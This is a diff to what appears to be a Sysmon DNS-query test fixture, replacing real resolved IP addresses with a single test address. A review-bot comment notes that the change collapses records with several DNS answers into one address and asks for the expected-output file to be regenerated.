@@ -198,7 +198,7 @@ { "@timestamp": "2021-05-05T15:30:51.692Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -230,7 +230,7 @@ "ProcessId": "2736", "QueryName": "static-global-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;" + "QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;" } } }, 
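Review bot: In hunks -198 and -230 the two distinct resolved addresses (`::ffff:23.50.53.192;::ffff:23.50.53.195`) are both replaced with `89.160.20.156`, so the fixture no longer exercises a record with more than one distinct DNS answer; the same collapse happens in hunks -243, -399/-412 (four identical answers) and -483/-505. If the pipeline de-duplicates resolved addresses into a set-valued field (likely for `related.ip` or `dns.resolved_ip`, not visible here), the regenerated expected output for this file will shrink to a single address and a regression in per-answer parsing would no longer be caught. Use a different address from the supported subset for each answer within a record, e.g. `"QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:<second supported test IP>;"`, keeping the `event.original` XML and the parsed `QueryResults` in step as this commit already does. The `-expected.json` counterpart for `test-sysmon-operational-events.json` is not in view; it must be regenerated together with this change.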
@@ -243,7 +243,7 @@
 "ProcessId": "356",
 "QueryName": "www.bing.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;",
+ "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"
 },
 "process": {
@@ -269,7 +269,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" } }, @@ -380,7 +380,7 @@ "ProcessId": "2736", "QueryName": "linkmaker.itunes.apple.com", "QueryStatus": "0", - "QueryResults": "type: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;", + "QueryResults": "type: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.494", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -388,7 +388,7 @@ "event_id": "22" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -399,7 +399,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -412,7 +412,7 @@ "ProcessId": "2736", "QueryName": "confiant-integrations.global.ssl.fastly.net", "QueryStatus": "0", - "QueryResults": "::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -436,7 +436,7 @@ { "@timestamp": "2021-05-05T15:30:51.692Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -468,7 +468,7 @@ "ProcessId": "2736", "QueryName": "c.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;" + "QueryResults": "type: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;" } } }, 
@@ -483,7 +483,7 @@
 "ProcessId": "2736",
 "QueryName": "c.bing.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;",
+ "QueryResults": "type: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:01.948",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -505,7 +505,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -515,7 +515,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -525,7 +525,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:23.52.167.93;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.085", "ProcessGuid": 